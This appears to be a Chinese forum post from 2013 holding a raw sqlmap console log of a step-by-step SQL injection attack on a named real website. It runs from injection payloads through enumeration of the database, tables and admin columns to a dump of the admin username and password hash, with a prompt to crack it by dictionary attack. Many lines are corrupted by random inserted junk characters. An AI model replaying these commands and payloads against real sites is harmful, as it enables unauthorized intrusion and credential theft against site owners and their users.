D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
" R" e3 |) O' }1 nms "Mysql" --current-user /* 注解:获取当前用户名称
% B+ d0 V8 y2 F5 Q9 H, ]/ n4 n sqlmap/0.9 - automatic SQL injection and database takeover tool7 q& e6 m6 |' h% O1 }
http://sqlmap.sourceforge.net starting at: 16:53:54% w$ s. o+ m6 |. z
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as8 f6 |: R& W' T# f
session file n+ _1 _- |+ ]7 f; T+ z% Z. a
[16:53:54] [INFO] resuming injection data from session file2 X+ _6 G A: C+ X K/ s5 |
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
5 O+ v- @1 c4 V. x# u- c[16:53:54] [INFO] testing connection to the target url
7 T+ ? l+ k5 t) y! R/ Esqlmap identified the following injection points with a total of 0 HTTP(s) reque R! ^. k* d. k% d! A% w) k; i
sts:: ^; h, j/ l) m6 H, h
---
9 t1 U7 G1 u0 d6 aPlace: GET+ H0 d- D% @$ P. a
Parameter: id; F9 u# C' n$ X4 Y; `7 P& }
Type: boolean-based blind
& J' |- \" L& _0 C8 \" a: e# i) C e Title: AND boolean-based blind - WHERE or HAVING clause
$ w/ N/ C+ @! u) |2 [8 i! i* a& X4 ]4 b Payload: id=276 AND 799=799
: j: b7 P: W& i3 r F Type: error-based! z: O. i0 e; i$ [' K
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause, Y3 I( V/ L N0 {1 R C' E( c
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118, ~6 X }3 L6 _0 x6 ?
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
8 {" b) `7 x- q1 v: n" g),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
+ d) j4 G; A$ J% d5 R1 X" { Type: UNION query+ L1 s8 S- w2 @* K+ A' u
Title: MySQL UNION query (NULL) - 1 to 10 columns
) a7 S% t. t+ [' J& R) n Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
( ?0 D) O! m; \( Y! J! ^(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
5 f5 Y7 ?. {$ f* WCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#$ V" ~9 m" N* M! j1 K" {
Type: AND/OR time-based blind8 J# T/ Z7 N* l" L& ~# [% ^1 m: q9 b0 l4 d
Title: MySQL > 5.0.11 AND time-based blind. A4 s5 C0 C2 Q7 j0 f
Payload: id=276 AND SLEEP(5) X# v& q& w7 O4 h
---0 d# b% d) W$ ]* ^
[16:53:55] [INFO] the back-end DBMS is MySQL& Z& z9 r$ S8 C+ V+ A3 [6 r& }3 ]
web server operating system: Windows
, F: e+ W% o9 sweb application technology: Apache 2.2.11, PHP 5.3.0
) f3 i- U+ }1 }& l* a5 Nback-end DBMS: MySQL 5.0# `0 U4 T$ ~3 z, ~4 ?8 T
[16:53:55] [INFO] fetching current user
6 q/ w! Y+ p( M4 }% s" S1 k- e9 I8 \current user: 'root@localhost' * m! T2 s- b5 a" s h
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
! l5 L1 N# Q& V3 jtput\www.wepost.com.hk' shutting down at: 16:53:58
) g* S7 T* w- Y4 O) Z+ J! A, q3 M* e/ v5 M- y
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db1 }9 M, m2 R" m5 }3 ~) E
ms "Mysql" --current-db /*当前数据库 I7 c8 W. y% U/ u
sqlmap/0.9 - automatic SQL injection and database takeover tool, B9 G* z/ N/ b
http://sqlmap.sourceforge.net starting at: 16:54:165 n; g2 A( \- V# b9 B* L
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
' p8 X+ k% q% E! \* [ session file8 I; R& u' Z J3 |1 D
[16:54:16] [INFO] resuming injection data from session file! Q2 P& C u( Q4 q. L
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
& y& B& `7 S/ j; T+ Z4 t# y$ o[16:54:16] [INFO] testing connection to the target url+ Q% h4 M: c' W( A Q
sqlmap identified the following injection points with a total of 0 HTTP(s) reque: M2 I% Q+ L- a% {
sts:8 t9 i0 ^- E% k2 j3 m, P4 a- O
--- z( d* f8 P" H) E+ m
Place: GET( Z' o+ x! b4 F8 L# K- D/ ~5 {! {, y
Parameter: id
$ ]. U2 M5 Z& t3 I6 d* D. V Type: boolean-based blind
; ^9 _) m2 \2 K; ^, e Title: AND boolean-based blind - WHERE or HAVING clause& r+ |1 e; E- ~- i
Payload: id=276 AND 799=799
# _) O( m' U% L8 f. L Type: error-based
& _; l1 V8 E% {4 ^3 y Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- |0 J. n6 W7 a: y9 ? Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,' n. r5 ]# w9 H" v7 y" E
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
3 @" p- i6 R5 I),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)0 r0 |3 R$ d7 V3 u1 |% e
Type: UNION query. n3 X1 }3 Z6 M u2 g% M
Title: MySQL UNION query (NULL) - 1 to 10 columns- C( _* g3 e. C
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
2 i( j3 a Z) \/ Q: r, t9 S(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
7 ~- `+ D" k$ ~7 hCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
6 m3 U" |' T" ? Type: AND/OR time-based blind0 O/ q1 l0 N) ~6 P2 r
Title: MySQL > 5.0.11 AND time-based blind) N' R2 Y& ^, ]- q# n1 A* z7 b
Payload: id=276 AND SLEEP(5)
0 H! N9 L! L2 Y$ B---7 i% J, M: [8 q, D
[16:54:17] [INFO] the back-end DBMS is MySQL
! g/ Y$ q- c. C1 Eweb server operating system: Windows
6 e" Q2 N v5 y+ }& a& n: P2 oweb application technology: Apache 2.2.11, PHP 5.3.0# t8 w6 D) d" G4 a1 g
back-end DBMS: MySQL 5.05 M7 L7 N0 D# t( b5 G
[16:54:17] [INFO] fetching current database, b8 S" `* Q6 s$ | ]% |
current database: 'wepost'; p$ V' G, }3 i2 s* _4 I/ L0 M* C
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou1 X$ {2 @5 W8 l- w; w+ D4 ^( A3 R
tput\www.wepost.com.hk' shutting down at: 16:54:18
4 r6 z7 u" s+ `D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db, e5 d8 P5 \- [; k7 X
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
) ~' `; ?; @/ s sqlmap/0.9 - automatic SQL injection and database takeover tool
- ?' c6 M$ R. }/ P( w9 ~ http://sqlmap.sourceforge.net starting at: 16:55:254 Q# x" v6 X ~1 ~
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as+ a3 o8 k9 v0 B" p* z f6 G
session file9 y$ L3 C4 A) U. s$ I) L3 I0 U
[16:55:25] [INFO] resuming injection data from session file0 @6 i0 t& u/ n4 {' v# K
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
! ?6 d9 F) f/ d- P$ J% w1 Z[16:55:25] [INFO] testing connection to the target url
T, f2 h: W3 dsqlmap identified the following injection points with a total of 0 HTTP(s) reque( U5 G: G/ B; }+ ^, n
sts:
$ k" B, O2 j' G2 C8 I---
7 c) K, q0 N' W1 o+ q: h; b+ UPlace: GET. w+ N* R- w1 [5 j. E$ I( H! z4 o
Parameter: id2 h. X( q, l8 o- f0 [3 ? z
Type: boolean-based blind$ n- [2 Y, y+ U7 @
Title: AND boolean-based blind - WHERE or HAVING clause" Z/ e7 M$ r* z7 |" n
Payload: id=276 AND 799=799, y2 m# D" M5 t0 W/ Q% ~% w
Type: error-based: z' `! v+ ?5 X8 Z7 y) Y; N
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
0 ~1 \) k: F. Y Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
" y/ V- O. C& s120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58# z2 b) V# \! G5 S8 N9 k/ c2 w7 A
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
1 X3 T# T4 t# s4 s2 ^ Type: UNION query# Y1 V1 Q$ m% H5 a
Title: MySQL UNION query (NULL) - 1 to 10 columns
' o' [1 X, O- `9 m, b7 Z b* c Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR6 n! \. Z8 S+ a: Q! `/ z& z+ ~
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
9 G# X9 C5 j; L/ p. xCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#9 {8 M m/ N- U$ ]- Q [0 F
Type: AND/OR time-based blind# j0 g- O1 t$ U3 D" o# B
Title: MySQL > 5.0.11 AND time-based blind
8 a3 i. K2 o( v9 t) F* ^* f Payload: id=276 AND SLEEP(5)
+ |: q! b, x' u; M9 I---
5 F: {. s( Y9 C* D[16:55:26] [INFO] the back-end DBMS is MySQL( K% R: }3 }' R* R3 S9 W
web server operating system: Windows ?1 `; F# {/ _; J2 a% \! Q" m9 {
web application technology: Apache 2.2.11, PHP 5.3.0
. q4 `. k2 U0 b- t& ^: f( Kback-end DBMS: MySQL 5.02 a# F) l! ?% N$ x, f/ {6 u
[16:55:26] [INFO] fetching tables for database 'wepost'
2 b- s( Q2 J& ?; L2 K( w* F7 o[16:55:27] [INFO] the SQL query used returns 6 entries# |8 k" {' \5 E7 g
Database: wepost
7 A2 e- J; b! p* G8 v* X7 L! [[6 tables]
% |1 X3 q8 Z9 N+-------------+! N. k* V- W+ l; P W
| admin |
2 M) [: @0 [1 `( `9 }| article |4 j& F% O" Q5 P& ?7 T
| contributor |) l0 [, M% O! Y+ @4 f- z% w. j% {
| idea |
3 P7 M; Q9 N7 _, M1 b| image |
. E( e( c3 p% P4 v% @* R" @9 r| issue |
8 s0 n( M. c/ L; R8 T( x; d2 U! ~+-------------+5 ?: S1 t w- U j2 |1 q
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou8 J8 r* B; h6 {8 a7 D" b' }9 F
tput\www.wepost.com.hk' shutting down at: 16:55:33
6 B+ b9 Q/ ~( b7 t1 T* T* S& ?) d5 _- m
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
# e: f2 U: u% @1 t2 \ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名$ @8 Z4 G$ Q/ Q: D
sqlmap/0.9 - automatic SQL injection and database takeover tool A- q- `7 W3 F% o5 _7 P8 L; I
http://sqlmap.sourceforge.net starting at: 16:56:067 z+ F) T4 l% |: q0 {
sqlmap identified the following injection points with a total of 0 HTTP(s) reque0 x+ s( x5 q2 Y5 f2 u$ _
sts:
9 c, x0 z% d: @3 V---
- k3 v8 b. t- t4 `Place: GET6 I9 m: ^/ K8 O8 I6 W
Parameter: id# R" X8 u8 f/ E* G7 Z
Type: boolean-based blind: P) s1 P/ B, R6 P
Title: AND boolean-based blind - WHERE or HAVING clause0 z0 f( s$ y; l
Payload: id=276 AND 799=799/ {' N; Z. j9 [; }8 ^( j
Type: error-based3 S% ^. B) a& G T; Q* a' k2 H
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause, ]4 u" V9 E& a% R$ s
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,; J, x7 p8 h8 k* \' A
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58, ?$ Q6 b, S) B/ \& r
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)( E+ k; y% m/ c" `' d5 h
Type: UNION query# k6 a. ~. u3 m1 \
Title: MySQL UNION query (NULL) - 1 to 10 columns* w/ S" x# `0 o2 ~: y; C- U3 J- v
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
! j4 ^( L- L, E# Q(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
- o6 A0 X: E- @6 ~7 I- r" L! L2 SCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL# Y6 h$ J" B/ a( l& u4 `' I
Type: AND/OR time-based blind
. J3 K O9 L9 x Title: MySQL > 5.0.11 AND time-based blind3 Y0 g& j- G# x( L* X
Payload: id=276 AND SLEEP(5)
9 W6 I$ M3 _ ?% c---
9 u2 m7 H1 D6 ^- ~3 }/ o3 d3 jweb server operating system: Windows, S3 \6 S& b8 u, Q; `( w
web application technology: Apache 2.2.11, PHP 5.3.02 P; o9 @ S: k% n, N
back-end DBMS: MySQL 5.0
; x. O; K* S3 b" F3 \[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
2 u. ^; |' ^: f! V# u0 v2 g; vssion': wepost, wepost
8 h( ]0 r! D8 q6 ?Database: wepost
" W) ]% W. {1 _9 O# C' ETable: admin
+ D& a2 l1 L" H" J[4 columns]
% X! N% }) |, M+ U8 f+----------+-------------+- Y4 H* ?7 Z) d
| Column | Type |
- P5 V/ K- C2 \' a8 y7 _ j9 W+----------+-------------+
3 [* i1 z- R# M$ M3 k' s| id | int(11) |1 `1 J" Y# ^* k
| password | varchar(32) |
7 N* n8 o5 F( v3 {6 ?6 O| type | varchar(10) |
" N) j; v3 A1 W| userid | varchar(20) |
8 F2 p, Q0 q9 x9 ?" U% n+----------+-------------+- Y) h& C: Z; i0 E9 p3 s
shutting down at: 16:56:19
# J1 E$ J0 f6 r- G2 c" V
! ]1 s. {& R& h& t6 }0 zD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
" |- X# b7 R7 \- ~$ ~% Q {& wms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
' ^ d1 _& a3 j" j8 q! `- S sqlmap/0.9 - automatic SQL injection and database takeover tool
2 x3 R# ^: G2 v http://sqlmap.sourceforge.net starting at: 16:57:14
6 Y& `+ b( n# K0 O; Osqlmap identified the following injection points with a total of 0 HTTP(s) reque
0 G2 n( v" U1 R" \7 I: Z( Gsts:
/ r7 h3 P" \# ] {0 q. v---
- M& Y8 n, G9 U6 O% Q2 xPlace: GET5 `4 D* C O: n2 f6 b; B
Parameter: id; R- g) ` B+ F$ O- W( L% {
Type: boolean-based blind7 r2 w( R, I( j4 p" p' v
Title: AND boolean-based blind - WHERE or HAVING clause1 u) B. N7 a0 M
Payload: id=276 AND 799=799
! E4 g# u7 n$ a& @1 I Type: error-based
9 D3 _7 P/ F' B$ ^ Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause% t8 m! E5 S' N7 m+ G
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
+ t7 V% ~* I2 K9 K& V, M* }120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
0 s4 E7 O8 q6 \ ?* z0 x- |),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)' x" k. X% Z" `
Type: UNION query7 o. R0 f3 i0 r, P C- l
Title: MySQL UNION query (NULL) - 1 to 10 columns* ~" K' n9 u/ t9 f( P% B; G% f
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR8 {2 K( V# |2 U! x' A2 H
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
& b, ^% g* ?0 i0 [( [CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
/ r% T0 w; C( x' ^9 [/ j, j Type: AND/OR time-based blind
$ w5 E2 B& _6 r- s! ?/ B" V; B9 U Title: MySQL > 5.0.11 AND time-based blind
& c1 } L P7 N! l) z0 P Payload: id=276 AND SLEEP(5)& p. |1 z2 m5 C$ ]
---
. {+ L- ]/ a' F, X4 v# }web server operating system: Windows8 F: ]) \1 g- Y
web application technology: Apache 2.2.11, PHP 5.3.0+ P: O$ Y( t9 e% U
back-end DBMS: MySQL 5.0
' e! [! W) g7 {8 |recognized possible password hash values. do you want to use dictionary attack o! A; ^% {5 F/ A2 n; s
n retrieved table items? [Y/n/q] y
1 N$ \" \% T& |, V- z- z, ?what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
+ d1 y! x* m! s" [4 H) W; T6 f8 kdo you want to use common password suffixes? (slow!) [y/N] y+ [$ p9 I( L7 p7 e) `/ G( T
Database: wepost2 t" u4 D# K; s" ^$ y
Table: admin( p9 {: ~4 x. s
[1 entry]
; l* E7 G4 P5 ~' G9 E* g* V3 {$ m7 P+----------------------------------+------------+
^& \1 w/ r' V: i; H| password | userid |7 D; r# M, P+ D9 J+ x
+----------------------------------+------------+" E9 z0 N* H6 c7 W* x; Z# d
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+ H" ]1 `5 r$ C$ h+----------------------------------+------------+
8 C/ ?" Y* S$ ^* v* |- e7 T6 w- B shutting down at: 16:58:14
( T; n4 [$ a" g
4 d5 u: L7 I" R5 ]D:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对